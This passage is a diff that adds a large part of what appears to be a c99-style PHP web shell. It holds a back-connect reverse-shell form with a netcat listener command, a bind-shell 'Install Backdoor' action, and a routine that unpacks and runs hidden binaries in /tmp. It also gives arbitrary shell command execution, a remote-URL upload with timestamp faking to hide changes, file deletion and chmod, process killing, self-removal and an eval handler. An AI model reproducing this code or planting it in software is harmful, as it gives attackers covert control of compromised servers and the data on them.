+  echo "&nbsp;<a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b></b></a>";
+ }
+ echo "</br></br><b>Base convertations</b>:</br></br>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"";
+ $c = strlen($encoder_input);
+ for($i=0;$i<$c;$i++)
+ {
+  $hex = dechex(ord($encoder_input[$i]));
+  if ($encoder_input[$i] == "&") {echo $encoder_input[$i];}
+  elseif ($encoder_input[$i] != "\\") {echo "%".$hex;}
+ }
+ echo "\" readonly><br></form>";
+}
+if ($act == "backc")
+{
+ $ip = $_SERVER["REMOTE_ADDR"];
+ $msg = $_POST['backcconnmsg'];
+ $emsg = $_POST['backcconnmsge'];
+ echo("<b>Back-Connection:</b></br></br><form name=form method=POST>Host:<input type=text name=backconnectip size=15 value=$ip> Port: <input type=text name=backconnectport size=15 value=5992> Use: <select size=1 name=use><option value=Perl>Perl</option><option value=C>C</option></select> <input type=submit name=submit value=Connect></form>Click 'Connect' only after you open port for it first. Once open, use NetCat, and run '<b>nc -l -n -v -p 5992</b>'<br><br>");
+ echo("$msg");
+ echo("$emsg");
+}
+
+if ($act == "shbd"){
+$msg = $_POST['backcconnmsg'];
+$emsg = $_POST['backcconnmsge'];
+echo("<b>Bind Shell Backdoor:</b></br></br><form name=form method=POST>
+Bind Port: <input type='text' name='backconnectport' value='5992'>
+<input type='hidden' name='use' value='shbd'>
+<input type='submit' value='Install Backdoor'></form>");
+echo("$msg");
+echo("$emsg");
+}
+
+
+if ($act == "proxy") {
+ cf("/tmp/hantu.tgz",$proxy_shit);
+ ex("cd /tmp;tar -zxvf hantu.tgz");
+ ex("cd /tmp;cd .setan;chmod 777 xh");
+ ex("cd /tmp;cd .setan;chmod 777 httpd");
+ ex("cd /tmp;cd .setan;./xh -s [kmod] ./httpd start");
+ checkproxyhost();
+ $msg = $_POST['proxyhostmsg'];
+ echo("$msg");
+ unlink("/tmp/hantu.tgz");
+ ex("cd /tmp; rm -r .setan"); 
+}
+
+if ($act == "selfremove")
+{
+ if (($submit == $rndcode) and ($submit != ""))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Gone!"; c99shexit(); }
+  else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";}
+ }
+ else
+ {
+  if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";}
+  $rnd = rand(0,9).rand(0,9).rand(0,9);
+  echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." </br></br>For confirmation, enter \"".$rnd."\"</b>:&nbsp;<input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit>&nbsp;<input type=submit value=\"YES\"></form>";
+ }
+}
+if ($act == "search"){
+ echo "<b>Search file-system:</b></br></br>";
+ if (empty($search_in)) {$search_in = $d;}
+ if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
+ if (empty($search_text_wwo)) {$search_text_regexp = 0;}
+ if (!empty($submit))
+ {
+  $found = array();
+  $found_d = 0;
+  $found_f = 0;
+  $search_i_f = 0;
+  $search_i_d = 0;
+  $a = array
+  (
+   "name"=>$search_name, "name_regexp"=>$search_name_regexp,
+   "text"=>$search_text, "text_regexp"=>$search_text_regxp,
+   "text_wwo"=>$search_text_wwo,
+   "text_cs"=>$search_text_cs,
+   "text_not"=>$search_text_not
+  );
+  $searchtime = getmicrotime();
+  $in = array_unique(explode(";",$search_in));
+  foreach($in as $v) {c99fsearch($v);}
+  $searchtime = round(getmicrotime()-$searchtime,4);
+  if (count($found) == 0) {echo "<b>No files found!</b>";}
+  else
+  {
+   $ls_arr = $found;
+   $disp_fullpath = TRUE;
+   $act = "ls";
+  }
+ }
+ echo "<form method=POST>
+<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\">
+<b>File/folder name: </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp
+<br><b>Directory:&nbsp;&nbsp; </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
+<br><b>Text:</b>&nbsp;&nbsp;<input type=text name=\"search_text\" size=42 value=".htmlspecialchars($search_text).">
+
+<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive
+&nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text
+<br><br><input type=submit name=submit value=\"Search\"></form>";
+ if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";}
+}
+if ($act == "chmod")
+{
+ $mode = fileperms($d.$f);
+ if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
+ else
+ {
+  $form = TRUE;
+  if ($chmod_submit)
+  {
+   $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
+   if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";}
+   else {$err = "Can't chmod to ".$octet.".";}
+  }
+  if ($form)
+  {
+   $perms = parse_perms($mode);
+   echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
+  }
+ }
+}
+if ($act == "upload")
+{
+ $uploadmess = "";
+ $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
+ if (empty($uploadpath)) {$uploadpath = $d;}
+ elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";}
+ if (!empty($submit))
+ {
+  global $HTTP_POST_FILES;
+  $uploadfile = $HTTP_POST_FILES["uploadfile"];
+  if (!empty($uploadfile["tmp_name"]))
+  {
+   if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
+   else {$destin = $userfilename;}
+   if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"].". Can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\".</br></br>";}
+  }
+  elseif (!empty($uploadurl))
+  {
+   if (!empty($uploadfilename)) {$destin = $uploadfilename;}
+   else
+   {
+    $destin = explode("/",$destin);
+    $destin = $destin[count($destin)-1];
+    if (empty($destin))
+    {
+     $i = 0;
+     $b = "";
+     while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
+   }
+   if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
+   else
+   {
+    $st = getmicrotime();
+    $content = @file_get_contents($uploadurl);
+    $dt = round(getmicrotime()-$st,4);
+    if (!$content) {$uploadmess .=  "Can't download file!<br>";}
+    else
+    {
+     if ($filestealth) {$stat = stat($uploadpath.$destin);}
+     $fp = fopen($uploadpath.$destin,"w");
+     if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
+     else
+     {
+      fwrite($fp,$content,strlen($content));
+      fclose($fp);
+      if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
+     }
+    }
+   }
+  }
+ }
+ if ($miniform)
+ {
+  echo "<b>".$uploadmess."</b>";
+  $act = "ls";
+ }
+ else
+ {
+  echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST>
+Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br>
+Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
+Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
+File-name (auto-fill): <input name=uploadfilename size=25><br><br>
+<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br>
+<input type=submit name=submit value=\"Upload\">
+</form>";
+ }
+}
+if ($act == "delete")
+{
+ $delerr = "";
+ foreach ($actbox as $v)
+ {
+  $result = FALSE;
+  $result = fs_rmobj($v);
+  if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
+ }
+ if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
+ $act = "ls";
+}
+if (!$usefsbuff)
+{
+ if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";}
+}
+else
+{
+ if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls"; }
+ elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";}
+ elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} c99_sess_put($sess_data); $act = "ls";}
+ if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);}
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+ elseif ($actarcbuff)
+ {
+  $arcerr = "";
+  if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
+  else {$ext = ".tar.gz";}
+  if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
+  $cmdline .= " ".$actarcbuff_path;
+  $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
+  foreach($objects as $v)
+  {
+   $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
+   if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
+   if (is_dir($v))
+   {
+    if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
+    $v .= "*";
+   }
+   $cmdline .= " ".$v;
+  }
+  $tmp = realpath(".");
+  chdir($d);
+  $ret = myshellexec($cmdline);
+  chdir($tmp);
+  if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
+  $ret = str_replace("\r\n","\n",$ret);
+  $ret = explode("\n",$ret);
+  if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   if (in_array($v,$ret)) {fs_rmobj($v);}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
+  $act = "ls";
+ }
+ elseif ($actpastebuff)
+ {
+  $psterr = "";
+  foreach($sess_data["copy"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
+   if ($copy_unset) {unset($sess_data["copy"][$k]);}
+  }
+  foreach($sess_data["cut"] as $k=>$v)
+  {
+   $to = $d.basename($v);
+   if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
+   unset($sess_data["cut"][$k]);
+  }
+  c99_sess_put($sess_data);
+  if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
+  $act = "ls";
+ }
+}
+if ($act == "cmd")
+{
+if (trim($cmd) == "ps aux") {$act = "processes";}
+elseif (trim($cmd) == "tasklist") {$act = "processes";}
+else
+{
+ @chdir($chdir);
+ if (!empty($submit))
+ {
+  $execcmd = $_REQUEST['cmd'];
+  echo "Result Of Locally Executed Command: <b>$execcmd</b></br>";
+  $olddir = realpath(".");
+  @chdir($d);
+  $ret = myshellexec($cmd);
+  $ret = convert_cyr_string($ret,"d","w");
+  if ($cmd_txt)
+  {
+   $rows = count(explode("\r\n",$ret))+1;
+   if ($rows < 10) {$rows = 10;}
+   echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
+  }
+  else {echo $ret."<br>";}
+  @chdir($olddir);
+ }
+ else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}}
+ echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
+}
+}
+if ($act == "ls")
+{
+ if (count($ls_arr) > 0) {$list = $ls_arr;}
+ else
+ {
+  $list = array();
+  if ($h = @opendir($d))
+  {
+   while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
+   closedir($h);
+  }
+  else {}
+ }
+ if (count($list) == 0) {echo "<center><b>Can't open folder ".htmlspecialchars($d)."</b></center>";}
+ else
+ {
+  //Building array
+  $objects = array();
+  $vd = "f"; //Viewing mode
+  if ($vd == "f")
+  {
+   $objects["head"] = array();
+   $objects["folders"] = array();
+   $objects["links"] = array();
+   $objects["files"] = array();
+   foreach ($list as $v)
+   {
+    $o = basename($v);
+    $row = array();
+    if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";}
+    elseif (is_dir($v))
+    {
+     if (is_link($v)) {$type = "LINK";}
+     else {$type = "DIR";}
+     $row[] = $v;
+     $row[] = $type;
+    }
+    elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
+    $row[] = filemtime($v);
+    if (!$win)
+    {
+     $ow = posix_getpwuid(fileowner($v));
+     $gr = posix_getgrgid(filegroup($v));
+     $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
+    }
+    $row[] = fileperms($v);
+    if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
+    elseif (is_link($v)) {$objects["links"][] = $row;}
+    elseif (is_dir($v)) {$objects["folders"][] = $row;}
+    elseif (is_file($v)) {$objects["files"][] = $row;}
+    $i++;
+   }
+   $row = array();
+   $row[] = "<b>Name</b>";
+   $row[] = "<b>Size</b>";
+   $row[] = "<b>Modify</b>";
+   if (!$win)
+  {$row[] = "<b>Owner/Group</b>";}
+   $row[] = "<b>Perms</b>";
+   $row[] = "<b>Action</b>";
+   $parsesort = parsesort($sort);
+   $sort = $parsesort[0].$parsesort[1];
+   $k = $parsesort[0];
+   if ($parsesort[1] != "a") {$parsesort[1] = "d";}
+   $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
+   $y .= "[Sort-".($parsesort[1] == "a"?"Asc.":"Desc")."]</a>";
+   $row[$k] .= $y;
+   for($i=0;$i<count($row)-1;$i++)
+   {
+    if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
+   }
+   $v = $parsesort[0];
+   usort($objects["folders"], "tabsort");
+   usort($objects["links"], "tabsort");
+   usort($objects["files"], "tabsort");
+   if ($parsesort[1] == "d")
+   {
+    $objects["folders"] = array_reverse($objects["folders"]);
+    $objects["files"] = array_reverse($objects["files"]);
+   }
+   $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
+   $tab = array();
+   $tab["cols"] = array($row);
+   $tab["head"] = array();
+   $tab["folders"] = array();
+   $tab["links"] = array();
+   $tab["files"] = array();
+   $i = 0;
+   foreach ($objects as $a)
+   {
+    $v = $a[0];
+    $o = basename($v);
+    $dir = dirname($v);
+    if ($disp_fullpath) {$disppath = $v;}
+    else {$disppath = $o;}
+    $disppath = str2mini($disppath,60);
+    if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
+    elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
+    foreach ($regxp_highlight as $r)
+    {
+     if (ereg($r[0],$o))
+     {
+      if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();}
+      else
+      {
+       $r[1] = round($r[1]);
+       $isdir = is_dir($v);
+       if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir))
+       {
+        if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
+        $disppath = $r[2].$disppath.$r[3];
+        if ($r[4]) {break;}
+       }
+      }
+     }
+    }
+    $uo = urlencode($o);
+    $ud = urlencode($dir);
+    $uv = urlencode($v);
+    $row = array();
+    if ($o == ".")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif ($o == "..")
+    {
+     $row[] = "&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>";
+     $row[] = "LINK";
+    }
+    elseif (is_dir($v))
+    {
+     if (is_link($v))
+     {
+      $disppath .= " => ".readlink($v);
+      $type = "LINK";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+     }
+     else
+     {
+      $type = "DIR";
+      $row[] =  "&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>";
+      }
+     $row[] = $type;
+    }
+    elseif(is_file($v))
+    {
+     $ext = explode(".",$o);
+     $c = count($ext)-1;
+     $ext = $ext[$c];
+     $ext = strtolower($ext);
+     $row[] =  "&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>";
+     $row[] = view_size($a[1]);
+    }
+    $row[] = date("d.m.Y H:i:s",$a[2]);
+    if (!$win) {$row[] = $a[3];}
+    $row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
+    if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
+    else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
+    if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\">[Info]</a>&nbsp;".$checkbox;}
+    else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\">[Info]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\">[Change]</a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\">[Download]</a>&nbsp;".$checkbox;}
+    if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
+    elseif (is_link($v)) {$tab["links"][] = $row;}
+    elseif (is_dir($v)) {$tab["folders"][] = $row;}
+    elseif (is_file($v)) {$tab["files"][] = $row;}
+    $i++;
+   }
+  }
+  // Compiling table
+  $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
+  echo "<center><b><u>Listing Folder: ".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders</u></b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">";
+  foreach($table as $row)
+  {
+   echo "<tr>\r\n";
+   foreach($row as $v) {echo "<td>".$v."</td>\r\n";}
+   echo "</tr>\r\n";
+  }
+  echo "</table><hr size=\"1\" noshade><p align=\"right\">
+  <script>
+  function ls_setcheckboxall(status)
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = status;
+    id++;
+   }
+  }
+  function ls_reverse_all()
+  {
+   var id = 1;
+   var num = ".(count($table)-2).";
+   while (id <= num)
+   {
+    document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked;
+    id++;
+   }
+  }
+  </script>
+  <input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> 
+  <b>";
+  if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
+  {
+   echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
+  }
+  echo "<select name=act><option value=\"".$act."\">With selected:</option>";
+  echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
+  echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>";
+  if ($usefsbuff)
+  {
+   echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>";
+   echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>";
+   echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>";
+  }
+  echo "</select>&nbsp;<input type=submit value=\"Confirm\"></p>";
+  echo "</form>";
+ }
+}
+
+if ($act == "processes")
+{
+ echo "<b>Processes:</b><br>";
+ if (!$win) {$handler = "ps aux".($grep?" | grep '".addslashes($grep)."'":"");}
+ else {$handler = "tasklist";}
+ $ret = myshellexec($handler);
+ if (!$ret) {echo "</br>Can't execute \"".$handler."\"!";}
+ else
+ {
+  if (empty($processes_sort)) {$processes_sort = $sort_default;}
+  $parsesort = parsesort($processes_sort);
+  if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;}
+  $k = $parsesort[0];
+  if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+  else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+  $ret = htmlspecialchars($ret);
+  if (!$win)
+  {
+   if ($pid)
+   {
+    if (is_null($sig)) {$sig = 9;}
+    echo "Sending signal ".$sig." to #".$pid."... ";
+    if (posix_kill($pid,$sig)) {echo "OK.";}
+    else {echo "ERROR.";}
+   }
+   while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
+   $stack = explode("\n",$ret);
+   $head = explode(" ",$stack[0]);
+   unset($stack[0]);
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".$head[$i]."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+{
+ echo "<tr>";
+     $line = explode(" ",$line);
+     $line[10] = join(" ",array_slice($line,10));
+     $line = array_slice($line,0,11);
+     if ($line[0] == get_current_user()) {$line[0] = "<font color=green>".$line[0]."</font>";}
+     $line[] = "<a href=\"".$surl."act=processes&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>";
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  else
+  {
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("  ",$ret)) {$ret = str_replace("  ","",$ret);}
+   while (ereg("",$ret)) {$ret = str_replace("","",$ret);}
+   while (ereg(" ",$ret)) {$ret = str_replace(" ","",$ret);}
+   $ret = convert_cyr_string($ret,"d","w");
+   $stack = explode("\n",$ret);
+   unset($stack[0],$stack[2]);
+   $stack = array_values($stack);
+   $head = explode("",$stack[0]);
+   $head[1] = explode(" ",$head[1]);
+   $head[1] = $head[1][0];
+   $stack = array_slice($stack,1);
+   unset($head[2]);
+   $head = array_values($head);
+   if ($parsesort[1] != "a") {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\">[sort_desc]</a>";}
+   else {$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\">[sort_asc]</a>";}
+   if ($k > count($head)) {$k = count($head)-1;}
+   for($i=0;$i<count($head);$i++)
+   {
+    if ($i != $k) {$head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>";}
+   }
+   $prcs = array();
+   foreach ($stack as $line)
+   {
+    if (!empty($line))
+    {
+     echo "<tr>";
+     $line = explode("",$line);
+     $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]);
+     $line[2] = intval(str_replace(" ","",$line[2]))*1024; 
+     $prcs[] = $line;
+     echo "</tr>";
+    }
+   }
+  }
+  $head[$k] = "<b>".$head[$k]."</b>".$y;
+  $v = $processes_sort[0];
+  usort($prcs,"tabsort");
+  if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);}
+  $tab = array();
+  $tab[] = $head;
+  $tab = array_merge($tab,$prcs);
+  echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
+  foreach($tab as $i=>$k)
+  {
+   echo "<tr>";
+   foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "<td>".$v."</td>";}
+   echo "</tr>";
+  }
+  echo "</table>";
+ }
+}
+if ($act == "eval")
+{
+ if (!empty($eval))
+ {
+  echo "<b>Result of execution this PHP-code</b>:<br>";
